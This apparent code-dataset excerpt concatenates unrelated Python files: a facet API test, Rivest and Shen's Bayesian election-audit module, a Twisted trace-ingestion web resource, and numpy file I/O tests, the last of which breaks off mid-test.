"attributter": {
"facetegenskaber": [
{
"brugervendtnoegle": "bvn",
"integrationsdata": "data fra andet system",
"virkning": self.standard_virkning1
}
]
},
"tilstande": {
"facetpubliceret": [
{
"publiceret": "Publiceret",
"virkning": self.standard_virkning1
}
]
}
}
r = self.perform_request('/klassifikation/facet', json=facet)
# Check response
self.assert201(r)
# Check persisted data
facet['livscykluskode'] = 'Opstaaet'
self.assertQueryResponse(
'/klassifikation/facet',
facet,
uuid=r.json['uuid']
)
| mpl-2.0 | -8,037,694,351,018,209,000 | 27.958333 | 69 | 0.500719 | false |
ron-rivest/2017-bayes-audit | from-2012-bayes-audit/bayes.py | 1 | 21492 | # bayes.py
# Code for working with Bayes Post-Election Audits
# Ronald L. Rivest and Emily Shen
# 5/31/12
"""
----------------------------------------------------------------------
This code available under "MIT License" (open source).
Copyright (C) 2012 Ronald L. Rivest and Emily Shen.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------
"""
"""
Notation:
Even though Python is 0-indexed, we'll use one-indexing here, to
correspond better with our paper. The 0-th element of lists (arrays)
will be ignored (and is typically set to a dummy(-9)).
m -- the number of candidates (for plurality elections)
t -- the number of distinct ballot types possible resulting from
a machine scan or hand examination of a ballot.
One may consider "undervote" and "overvote" to be
ballot types (although they shouldn't win), in
                 which case we have t = m+2 for a plurality election.
The ballot types are coded as integers: 1, ..., t.
n -- the number of ballots cast.
r[1..n] -- the list of all the *reported* ballot types.
This is the "reported profile" for the election.
That is, r[i] is the ``machine result'' for ballot i.
a[1..n] -- the list of all the corresponding *actual* ballot types.
This is the "actual profile" for the election.
That is, a[i] is the ``hand audit result'' for ballot i.
In practice, these become known only one at a time,
as audited, instead of all at once, as coded here.
s -- the size of the current sample (the number of ballots
audited so far).
epsilon -- the provided ``upset risk limit'' (e.g. 0.05)
"""
######################################################################
# Reminder: this code runs about 7x faster with "pypy" than with
# the standard python interpreter ! Use pypy!
######################################################################
import math
import random
import string
import time
dummy = -9 # dummy value for array position 0
######################################################################
# TALLY
######################################################################
def tally(P,t):
"""
Return list of counts of each ballot type in profile P.
Assumes each entry of P[1:] is in 1...t, inclusive.
P is 0-indexed; dummy value P[0] is ignored.
returned count[j] is number of votes of type j, 1<=j<=t.
returned count[0] is a dummy value.
"""
count = [dummy]+[0]*t
for i in range(1,len(P)):
count[P[i]] += 1
return count
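# Example, following the commented-example convention used in this file
# (made-up profile): tally([dummy, 1, 1, 2, 3, 1], 3)
# --> [-9, 3, 1, 1]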
######################################################################
# SOCIAL CHOICE FUNCTION
######################################################################
"""
The social choice function that returns an election outcome for a
given profile with the tally results that are given in count[1..t].
The election outcome is typically an integer
(e.g. the most common ballot type), but can be any arbitrary
Python object that can be compared for equality.
There are many ways this routine could be coded, depending on the
choice of voting system; any (deterministic) voting system could
be used.
For our purposes, it is important that the social choice function f be
well-defined even for non-integer counts, since our Dirichlet
approximations will give non-integral values. This is OK, since
almost all voting systems are based on comparing vote totals of
various sorts, and integrality of vote totals is not required.
In practice, one may want to disallow "undervote" and "overvote" from
winning, if they are ballot types. This may be accomplished by
supplying an extra (optional) argument to f, a dictionary that
supplies additional parameters and information to f (in a way
that may depend on f, of course). See the example for plurality
below.
"""
def f_plurality(count,params=None):
"""
A simple example social choice function -- plurality elections.
Here we assume that the most common ballot type "wins", with
ties broken in favor of the lower-numbered outcome.
If params is supplied to f_plurality, it should be a dict such that
params['invalid'] is a list of outcomes that are not be allowed to win.
For example, f(count,{'invalid':[1]}) will not allow outcome 1.
You can use closures to get the desired binding of params in
social choice function, e.g.
        g = lambda count: f_plurality(count,{'invalid':[1]})
defines social choice function g that embeds the desired params
into f_plurality; g only takes count as an argument (the params
are now implicit).
"""
t = len(count)-1
if params != None:
invalid_list = params.get('invalid',[])
else:
invalid_list = []
outcome = 1
while outcome < t and outcome in invalid_list:
outcome += 1
for j in xrange(outcome+1,t+1):
if count[j]>count[outcome] and outcome not in invalid_list:
outcome = j
return outcome
def test_f_plurality():
"""
Simple test routine for social choice function f_plurality.
"""
P = [dummy]+[1, 1, 2, 0, 3, 1, 2]
t = 3
print "profile", P[1:]
count = tally(P,t)
print "outcome = ", f_plurality(count)
# ==> 1
P = [dummy]+[1, 2, 1, 2, 3, 4, 6]
print P[1:]
t = 6
count = tally(P,t)
print "outcome = ", f_plurality(count,{'invalid':[1]})
# ==> 2
# test_f_plurality()
######################################################################
# MAKE LIST OF HYPERPARAMETER MATRICES OR VECTORS
######################################################################
def make_prior_list(audit_type,t,ballot_polling):
"""
return list of t x t prior matrices if comparison audit
return list of t prior vectors if ballot-polling audit
audit_type is one of (where c is an integer):
"N" -- non partisan (uniform) all hyperparameters = 1 (same as N1)
"Nc" -- non partisan (uniform) all hyperparameters = c
"P" -- partisan: list of t matrices each all zeros except one column = to 1 (same as P1)
"Pc" -- partisan: list of t matrices each all zeros except one column = to c
"NP" -- N union P
"NPc" -- Nc union Pc
Each matrix is t x t with integer entries (with dummy entries to account for 0-indexing of lists).
"""
prior_list = [ ]
c_digits = [ d for d in audit_type if d in string.digits ]
if c_digits != [ ] :
c = int(string.join(c_digits,sep=""))
else:
c = 1
if not ballot_polling:
if "N" in audit_type:
prior_list += [ [dummy] +
[ [dummy]+[c]*t for j in xrange(1,t+1) ] # just one matrix, c's everywhere
]
if "P" in audit_type:
prior_list += [ [dummy] + [ [dummy]+[0]*(k-1) + [c] + [0]*(t-k) for j in xrange(1,t+1) ] # one for each type k
for k in xrange(1,t+1)
]
else: # ballot polling
if "N" in audit_type:
prior_list += [ [dummy] + [c]*t ] # just one vector of all c's
if "P" in audit_type:
prior_list += [ [dummy]+[0]*(k-1) + [c] + [0]*(t-k) # one for each type k
for k in xrange(1,t+1)
]
return prior_list
# print make_prior_list("N2",3,True)
# --> [[-9, 2, 2, 2]]
# print make_prior_list("P2",3,True)
# --> [[-9, 2, 0, 0], [-9, 0, 2, 0], [-9, 0, 0, 2]]
# print make_prior_list("N2",3,False)
# --> [ [-9, [-9, 2, 2, 2], [-9, 2, 2, 2], [-9, 2, 2, 2]] ]
# print make_prior_list("P2",3,False)
# --> [ [-9, [-9, 2, 0, 0], [-9, 2, 0, 0], [-9, 2, 0, 0]],
# [-9, [-9, 0, 2, 0], [-9, 0, 2, 0], [-9, 0, 2, 0]],
# [-9, [-9, 0, 0, 2], [-9, 0, 0, 2], [-9, 0, 0, 2]]]
######################################################################
# MAKE AUDITING SCHEDULE
######################################################################
def make_schedule(n,pattern):
"""
Make up an auditing schedule (a list of sample size s values to use)
start with 0
    do pattern, then pattern repeatedly multiplied by last/first, etc.
end with n
note that last/first does not need to be an integer.
make_schedule(1000,[1,2]) # --> 0,1,2,4,8,16,32,64,128,256,512,1000
make_schedule(1000,[1,2,5,10]) # --> 0,1,2,5,10,20,50,100,200,500,1000
make_schedule(1000,[5,6]) # --> 0,5,6,7,8,10,12,14,17,21,25,30,37,44,53,64,77,...
"""
schedule = [ 0 ]
multiplier = 1
next_s = 1
while schedule[-1] < n:
for x in pattern:
next_s = int(x*multiplier)
next_s = min(n,next_s)
if next_s > schedule[-1]:
schedule.append(next_s)
multiplier *= float(pattern[-1])/float(pattern[0])
return schedule
######################################################################
# AUDIT (top-level dispatch function)
######################################################################
audit_method = "dirichlet" # switch to control dispatch
# alternative is "polya"
def audit(r,a,t,epsilon,schedule,printing_wanted=True,ballot_polling=False,f=f_plurality,audit_type="N"):
"""
Audit the election, given reported ballot types (r), actual
ballot types (a), and an upset probability limit (epsilon).
Each ballot type should be an integer in the range 1 to t (incl.)
ballot_polling=True if we want a ballot-polling audit.
f is the social choice function (defaults to plurality among ballot types)
Assumes the ballots already in some "random order"
r[0] and a[0] are ignored; only r[1..n] and a[1..n] are considered.
t = number of ballot types possible (numbered 1...t, inclusive)
audit_type is one of (where c is an integer) (default is "N"):
"N" -- non partisan (uniform) all hyperparameters = 1 (same as N1)
"Nc" -- non partisan (uniform) all hyperparameters = c
"P" -- partisan: list of t matrices each all zeros except one column = to 1 (same as P1)
"Pc" -- partisan: list of t matrices each all zeros except one column = to c
"NP" -- N union P
"NPc" -- Nc union Pc
The audit stops when upset probability is at most epsilon for *all* priors in list.
returns (result, s)
where result=="OK" if the reported outcome seems OK, else result=="NOT OK"
and where s == number of ballots examined.
"""
n = len(r)-1 # number of ballots in r
assert len(r) == len(a) # should have the same length
assert min(r[1:]) >= 1
assert max(r[1:]) <= t
assert min(a[1:]) >= 1
assert max(a[1:]) <= t
if audit_method == "dirichlet":
return audit_dirichlet(r,a,t,epsilon,schedule,printing_wanted,ballot_polling,f,audit_type)
elif audit_method == "polya":
import polya
return polya.audit_polya(r,a,t,epsilon,schedule,printing_wanted,ballot_polling,f,audit_type)
else:
print "In audit(): illegal audit_method specification:",audit_method
quit()
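# Minimal usage sketch (not from the original paper or code; the profile and the
# perfect-scanner assumption are made up purely to show the call pattern):
# n, t = 10000, 2
# r = [dummy] + [1]*6000 + [2]*4000   # reported profile
# a = r[:]                            # hand audit agrees everywhere (no errors)
# schedule = make_schedule(n, [1, 2, 5, 10])
# result, s = audit(r, a, t, 0.05, schedule, printing_wanted=False)
# (in a real audit the ballots must first be placed in random order)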
######################################################################
# DIRICHLET DISTRIBUTION
######################################################################
def dirichlet(alphas,n):
"""
Sample from a Dirichlet distribution.
return n times a Dirichlet random variable generated according to the given alphas.
note that alphas[0] is dummy to be ignored.
ignores alphas that are 0 (i.e. generates a zero component here)
returns vector x of same length as alphas
"""
# print "alphas",alphas
t = len(alphas)-1
x = [dummy] + [0.0]*t
sumx = 0.0
for k in xrange(1,t+1):
if alphas[k]>0.0:
x[k] = random.gammavariate(alphas[k],1)
sumx += x[k]
assert sumx > 0.0
for k in xrange(1,t+1):
x[k] = n * x[k] / sumx
return x
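# Example (output values are random; shown only to illustrate the interface):
# dirichlet([dummy, 2, 1, 1], 100)
# --> something like [-9, 52.3, 24.1, 23.6]; the non-dummy entries sum to 100,
# and a zero alpha forces the corresponding component to 0.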
######################################################################
# AUDIT USING DIRICHLET DISTRIBUTION
######################################################################
def audit_dirichlet(r,a,t,epsilon,schedule,printing_wanted=True,ballot_polling=False,f=f_plurality,audit_type="N"):
"""
Audit the election, given reported ballot types (r), actual
ballot types (a), and an upset probability limit (epsilon)
Each ballot type should be an integer in the range 1 to t (incl.)
    Assumes the ballots are already in some "random order"
r[0] and a[0] are ignored; only r[1..n] and a[1..n] are considered.
t = number of ballot types possible (numbered 1...t, inclusive)
ballot_polling=True if we want a ballot_polling audit (then r is ignored)
f is the social choice function (defaults to plurality among ballot types)
audit_type is one of (where c is an integer):
"N" -- non partisan (uniform) all hyperparameters = 1 (same as N1)
"Nc" -- non partisan (uniform) all hyperparameters = c
"P" -- partisan: list of t matrices each all zeros except one column = to 1 (same as P1)
"Pc" -- partisan: list of t matrices each all zeros except one column = to c
"NP" -- N union P
"NPc" -- Nc union Pc
returns ("OK",s) if the reported outcome seems OK
Otherwise it returns ("NOT OK",s)
where s is the number of ballots examined.
"""
n = len(r)-1 # number of ballots in r
assert len(r) == len(a) # should have the same length
assert min(r[1:]) >= 1
assert max(r[1:]) <= t
assert min(a[1:]) >= 1
assert max(a[1:]) <= t
R = tally(r,t)
reported_outcome = f(R)
A = tally(a,t)
actual_outcome = f(A)
prior_list = make_prior_list(audit_type,t,ballot_polling)
if printing_wanted:
print "%8d = number of ballot types"%t
print "%8d = number of total ballots"%n
print "%8.4f = epsilon (upset probabilitylimit)"%epsilon
print "audit_type = ",audit_type
print "%8d = number of priors"%len(prior_list)
for x in R[1:]:
print "%8d "%x,
print "= counts of reported ballots (reported outcome is %4d )"%reported_outcome
for x in A[1:]:
print "%8d "%x,
print "= counts of actual ballots (actual outcome is %4d )"%actual_outcome
print "Ballot-polling audit:",ballot_polling
# main loop -- do samples of given sizes from schedule
s = 0
# initialize counts to zero
if not ballot_polling:
count = [dummy] + [ [dummy]+[0]*t for j in xrange(1,t+1) ] # allocate this only once
else: # ballot-polling
count = [dummy]+[0]*t # allocate this only once
for next_s in schedule:
# audit enough ballots so that s = next_s
while s < next_s:
s = s + 1
# In practice you'd be looking at a paper ballot in the next line;
# in this code, we assume actual ballot types already available in array a.
pass # <-- audit ballot number s here; that is, determine a[s]
if not ballot_polling:
count[r[s]][a[s]] += 1
else:
count[a[s]] += 1
# now number of ballots audited is s
max_upset_prob = -1.0
for prior in prior_list:
# Determine probability of each outcome (dictionary "wins")
# Determine u the probability of an election upset
            # Determine z the number of simulated profiles examined within the win_probs routine
wins,u,z = win_probs(r,a,t,s,n,count,ballot_polling,f,prior)
if printing_wanted:
print "After %6d ballots audited, probability of an upset is %7.4f"%(s,u),"(z = %4d simulated profiles)"%z,
print "(winning probabilities are:",wins,")"
max_upset_prob = max(u,max_upset_prob)
breakout = True
if breakout and max_upset_prob > epsilon: # don't bother with other priors
break
# decide to quit if max_upset prob is at most epsilon
if max_upset_prob<=epsilon:
if printing_wanted:
print "Reported election outcome is OK (%d ballots audited)"%s
# print "count:",count
return ("OK",s)
else:
if printing_wanted:
print "Reported election outcome was NOT OK !!! (All %d ballots audited)"%n
return ("NOT OK",s)
def win_probs(r,a,t,s,n,count,ballot_polling=False,f=f_plurality,prior=None):
"""
Use simulation to determine the probability of each outcome.
s is sample size (so far), 0 <= s <= n
for comparison audit:
count[j][k] is number of ballots of reported type j and actual type k (plus hyperparameter prior[j][k]) in ballots 1..s
for ballot-polling audit
count[k] is number of ballots of actual type k (plus hyperparameter prior[k]) in ballots 1..s
ballot_polling is True iff we want a ballot-polling audit
f is social choice function
return dictionary mapping outcomes to frequency of winning, upset probability, and max_trials
"""
R = tally(r,t) # tally of reported votes
if not ballot_polling: # only have reported votes if not ballot polling
reported_outcome = f(R)
max_trials = 10000 # determines accuracy of u (upset probability)
upsets = 0
B = [dummy] + [0]*t # allocate this only once (tally for simulated profile)
alphas = [dummy] + [0]*t # allocate only once (alphas for Dirichlet)
wins = dict() # keep track of number of wins for each outcome
for j in xrange(1,t+1):
wins[j] = 0
if not ballot_polling: # comparison audit
Rrem = [dummy] + [0]*t # Rrem[j] is number remaining unaudited of reported type j
for j in xrange(1,t+1):
Rrem[j] = R[j] # number remaining unaudited of reported type j
for j in xrange(1,t+1):
for k in xrange(1,t+1):
Rrem[j] -= count[j][k]
for z in xrange(1,max_trials+1):
for k in xrange(1,t+1):
B[k] = 0 # initialize tally for profile b to zero.
for j in xrange(1,t+1): # add in actual counts for ballots audited so far
for k in xrange(1,t+1):
B[k] += count[j][k]
for j in xrange(1,t+1): # for each reported type
for k in xrange(1,t+1):
alphas[k] = prior[j][k] + count[j][k]
ds = dirichlet(alphas,Rrem[j]) # note: Rrem[j] is remaining size of profile of reported type j after sample
for k in xrange(1,t+1):
B[k] += ds[k] # add to counts for sample
new_outcome = f(B)
wins[new_outcome] = wins.get(new_outcome,0)+1
if new_outcome != reported_outcome:
upsets += 1
else: # ballot-polling audit
for k in xrange(1,t+1):
alphas[k] = prior[k] + count[k]
for z in xrange(1,max_trials+1):
ds = dirichlet(alphas,n-s) # n-s = number of unaudited ballots
for k in xrange(1,t+1):
ds[k] += count[k] # add counts to dirichlet for simulated ballot tally
new_outcome = f(ds)
wins[new_outcome] = wins.get(new_outcome,0)+1
# for ballot-polling audit, "upset prob" is 1 - max winning prob
upsets = max_trials - max(wins.values())
for outcome in wins.keys():
wins[outcome] = float(wins[outcome])/float(max_trials)
u = float(upsets) / float(max_trials)
return wins,u,max_trials
| mit | -1,709,334,529,340,910,800 | 42.330645 | 127 | 0.553136 | false |
zhaoxuan/baidu_restkin | restkin/api.py | 1 | 4948 | # Copyright 2012 Rackspace Hosting, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import pdb
from twisted.web import http
from twisted.python import log
from twisted.web.resource import Resource, NoResource
from tryfer.trace import Trace, Annotation, Endpoint
from restkin.utils import decode_hex_number
class RProxyWrapper(Resource):
rp_error_to_http_code = {
'NR-1000': http.UNAUTHORIZED,
'NR-1001': http.UNAUTHORIZED,
'NR-1002': http.UNAUTHORIZED,
'NR-5000': http.INTERNAL_SERVER_ERROR,
        'NR-2000': 429 # httpbis - Too Many Requests
}
def __init__(self, wrapped):
Resource.__init__(self)
self._wrapped = wrapped
def render(self, request):
headers = request.requestHeaders
rp_error_code = headers.getRawHeaders('X-RP-Error-Code')[0]
rp_error_response = headers.getRawHeaders('X-RP-Error-Message')[0]
request.setResponseCode(
self.rp_error_to_http_code.get(
rp_error_code, http.INTERNAL_SERVER_ERROR))
request.responseHeaders.setRawHeaders(
'Content-Type', ['application/json'])
return json.dumps({'ok': False,
'error_code': rp_error_code,
'error_message': rp_error_response})
def getChild(self, path, request):
if request.requestHeaders.hasHeader('X-RP-Error-Code'):
return self
return self._wrapped.getChild(path, request)
class RootResource(Resource):
def getChild(self, path, request):
if path == 'v1.0':
return VersionResource()
return NoResource()
class VersionResource(Resource):
def getChild(self, path, request):
if path == 'trace':
return TraceResource()
return NoResource()
# class TenantResource(Resource):
# def __init__(self, tenant_id):
# Resource.__init__(self)
# self._tenant_id = tenant_id
# def getChild(self, path, request):
# if path == 'trace':
# return TraceResource()
# return NoResource()
class TraceResource(Resource):
"""
    TraceResource is responsible for taking POST requests and converting
    the posted JSON trace data into a scribe log.
Response formats:
Success or partial failure:
{"succeeded": numberOfSucesfullyInsertedTraces,
"failed": numberOfTracesWhichFailedInsertion}
Failure due to invalid body:
{"error": "Error message"}
"""
def render_POST(self, request):
request.responseHeaders.setRawHeaders(
'content-type', ['application/json'])
body = request.content.read()
try:
spans = json.loads(body)
except ValueError:
log.err(None, 'Failed to decode request body')
msg = 'Could not decode request body (invalid JSON)'
return json.dumps({'error': msg})
succeeded, failed = 0, 0
for json_span in spans:
trace_id = None
span_id = None
try:
trace_id = decode_hex_number('trace_id', json_span['trace_id'])
span_id = decode_hex_number('span_id', json_span['span_id'])
parent_span_id = json_span.get('parent_span_id', None)
if parent_span_id is not None:
parent_span_id = decode_hex_number('parent_span_id',
parent_span_id)
t = Trace(json_span['name'], trace_id, span_id, parent_span_id)
for json_annotation in json_span['annotations']:
annotation = Annotation(
json_annotation['key'],
json_annotation['value'],
json_annotation['type'])
host = json_annotation.get('host', None)
if host:
annotation.endpoint = Endpoint(
host['ipv4'], host['port'], host['service_name'])
t.record(annotation)
succeeded = succeeded + 1
except Exception:
log.err(None,
'Failed to insert a trace: trace_id=%r,span_id=%r' %
(trace_id, span_id))
failed = failed + 1
continue
return json.dumps({'succeeded': succeeded, 'failed': failed})
| apache-2.0 | -2,226,201,732,277,251,300 | 30.316456 | 79 | 0.580841 | false |
qpython-android/QPypi-numpy | numpy/lib/tests/test_io.py | 1 | 31157 | import numpy as np
import numpy.ma as ma
from numpy.ma.testutils import *
import StringIO
import gzip
import os
from tempfile import mkstemp, NamedTemporaryFile
import sys, time
from datetime import datetime
MAJVER, MINVER = sys.version_info[:2]
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
return datetime(*time.strptime(s, fmt)[:3])
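# e.g. strptime("1971-01-01", "%Y-%m-%d") -> datetime(1971, 1, 1); only the
# date fields are kept, matching the [:3] slice above.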
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = StringIO.StringIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, StringIO.StringIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
self.roundtrip(a)
a = np.array([[1, 2], [3, 4]], int)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.roundtrip(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform=='win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.roundtrip(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
assert_equal(arr, self.arr_reloaded['arr_%d' % n])
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a,b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = StringIO.StringIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
class TestSaveTxt(TestCase):
def test_array(self):
a =np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = StringIO.StringIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[(fmt + ' ' + fmt + '\n') % (1, 2),
(fmt + ' ' + fmt + '\n') % (3, 4)])
a =np.array([[1, 2], [3, 4]], int)
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), ['1 2\n', '3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, ['1\n', '2\n', '3\n', '4\n'])
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), ['1 2\n', '3 4\n'])
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = StringIO.StringIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), ['1,2\n', '3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = StringIO.StringIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), ['01 2.0\n', '03 4.0\n'])
# A single multiformat string
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, ['01 : 2.0\n', '03 : 4.0\n'])
        # Specify delimiter, should be overridden
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, ['01 : 2.0\n', '03 : 4.0\n'])
class TestLoadTxt(TestCase):
def test_record(self):
c = StringIO.StringIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = StringIO.StringIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender','age','weight'),
'formats': ('S1',
'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = StringIO.StringIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = StringIO.StringIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = StringIO.StringIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = StringIO.StringIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or -999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = StringIO.StringIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or -999)}, \
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = StringIO.StringIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = StringIO.StringIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = StringIO.StringIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = StringIO.StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:,1])
        a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = StringIO.StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
        # Checking usecols together with an explicit structured dtype.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = StringIO.StringIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(arr['stid'], ["JOE", "BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = StringIO.StringIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_empty_file(self):
c = StringIO.StringIO()
assert_raises(IOError, np.loadtxt, c)
def test_unused_converter(self):
c = StringIO.StringIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
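        # here the converter does apply to the selected column, so '21' and
        # '42' are parsed as hexadecimal, giving 33 and 66 below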
assert_array_equal(data, [33, 66])
class Testfromregex(TestCase):
def test_record(self):
c = StringIO.StringIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
